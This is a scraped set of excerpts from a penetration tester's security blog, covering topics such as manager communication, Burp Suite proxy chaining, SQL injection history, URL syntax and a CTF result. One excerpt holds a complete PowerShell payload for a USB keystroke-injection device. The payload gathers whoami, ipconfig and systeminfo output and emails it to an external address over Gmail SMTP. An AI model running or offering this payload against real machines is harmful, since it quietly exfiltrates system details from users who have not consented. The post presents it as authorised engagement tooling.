I planned a post covering the Manager Feedback Cycle, but this blog post at Effective Managers covers most of what I was going to communicate. One thing I would add to this resource, is that both managers and subordinates should strike a balance in communications frequency: If communications are infrequent, important details can get overlooked, and it becomes harder to resolve conflicts. If communications are too frequent, the subordinate will feel like they’re being micro-managed while the manager will feel like the subordinate can’t solve problems on their own.

Apple gets a lot of flak in the InfoSec community, even though it’s an open secret that much of the InfoSec community has begun to use Apple products. I myself have been using a Mac laptop for the past ten years because they produced the first laptop I thought was worth spending money on. A lot of money. I’m a fan of Apple for more than just their products, however. I admire their stance on social issues that I care about. ...

It’s early 2016, and there are a multitude of content management systems and blog platforms out there: Wikipedia’s List of Content Management Systems The security blog I contribute to, Penetrate.IO runs on the venerable Wordpress and requires constant updates to stay one step ahead of attackers. This becomes tiresome after a while, especially since the only thing I’m interested in hosting is a series of articles. These don’t require server-side computation, simply hosting. It’s a little like web development from the late 90’s - I only require simple HTTP hosting. ...

I had the need to proxy traffic from Burpsuite to another proxy during web app testing this week. There are a few ways to do this, but this method was the easiest since I already had Burpsuite’s TLS certificate installed. For more information on this, see the Burpsuite help. To configure an upstream proxy for Burpsuite, such as OWASP ZAP, follow these steps: First, configure your upstream proxy that will sit between Burpsuite and the web application to listen on a different port since they both bind TCP 8080 by default. Here I’ve configured ZAP to listen on port 8082 : ...

This post was inspired by a client who came to me and said “I do not understand all of these findings, can you explain them to me?”, referring to my web application penetration test deliverable. We spoke for an hour, as I described the findings to him. I corrected him when his understanding was shaky, and I confirmed where his understanding was solid. He had a development background, and was studying for a security certification, but he was managing a large security project for a well-known company and I was surprised to learn he was a security newbie. At the end of our conversation, he thanked me and said “Now I understand, and I’ll make sure my manager does as well!” ...

What I hope are some reasonable basic security practice recommendations

On a recent engagement I supported the lead by developing a PowerShell payload for a RubberDucky. The gist is that it will run a handful of standard Windows commands and then e-mail the results to a specified address. It proved to be very helpful and I’ve included it below with comments: # Set execution policy to allow unrestricted script scope Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false #Create results file in current user's temp directory $results = $env:temp + '\results.txt' #Run whoami $who = 'whoami.exe' $rwho = & $who #Run ipconfig /all $ipc = 'ipconfig.exe' $ipcs = '/all' $ripc = & $ipc $ipcs #Run systeminfo $sysi = 'systeminfo.exe' $rsysi = & $sysi #Wait for systeminfo to finish Start-Sleep -s 5 #Write results $output = $rwho + $ripc + $rsysi | Out-File $results #Send results to e-mail address $hostname = $env:computername $SMTPServer = 'smtp.gmail.com' $SMTPInfo = New-Object Net.Mail.SmtpClient($SMTPServer, 587) $SMTPInfo.EnableSsl = $true $SMTPInfo.Credentials = New-Object System.Net.NetworkCredentials('<yourusername>', '<yourpassword>') $ResultMail = New-Object System.Net.Mail.MailMessage $ResultMail.From = '<fromaddress>' $ResultMail.To.Add('<destinationmail>') $ResultMail.Subject = "Mail Subject" $ResultMail.Body = "Mail Body" $ResultMail.Attachments.Add($results) $SMTPInfo.Send($ResultMail) #Optional pop-up confirmation box #Note: This WILL raise user suspicion $wshell = New-Object -ComObject Wscript.Shell $wshell.Popup("Operation Complete.", 0, "OK", 0x1) Merry Christmas and Happy Holidays! ...

Inspired by Jack Daniel’s “Shoulders of InfoSec Project”, this post will be focused on the people and technologies behind one of the most prevalent attacks on web sites: SQL injection. According to OWASP, injection is the number one attack vector for web applications. Injection attacks can target many different contexts in a web application: HTML, PHP, ASP, Javascript, SQL, etc. Any context in which an interpreter parses input to execute instructions is potentially vulnerable to an injection attack. There are several - many, rather - excellent tutorials on Injection attacks available on the web. Here’s a brief selection of SQL injection attacks for reference: ...

URL Syntax https://admin:[email protected]:80/bio.txt;pp=1&qp=2#Three URL Part URL Data Scheme https User admin Password pass123 Subdomain www Domain example.com Port 80 Path /bio.txt Path Parameter pp=1 Query Parameter qp=2 Fragment Three Safe Characters RFC1738 section 2.2 outlines the safe characters to use in an HTTP URL Scheme: abcdefghijklmnopqrstuvwxyz0123456789$-_.+!*'(), Safe characters can be used in URLs without any form of encoding as they aren’t reserved for special use in the construction of the URL. ...

Unfortunately, I didn’t arrive at the ballroom early enough to get seats, or even standing room, to see this talk in-person: Ed Skoudis: How To Give The Best Pen Test Of Your Life If you’re a Pen Tester, this talk is a must-see. Once you’ve finished that talk, check out John Strand’s excellent follow-up talk! After competing for Friday night, most of Saturday, and Sunday morning, I emerged as the 30th position (solo) out of the 120 teams competing in the CTF. Not bad, but I want to do better! ...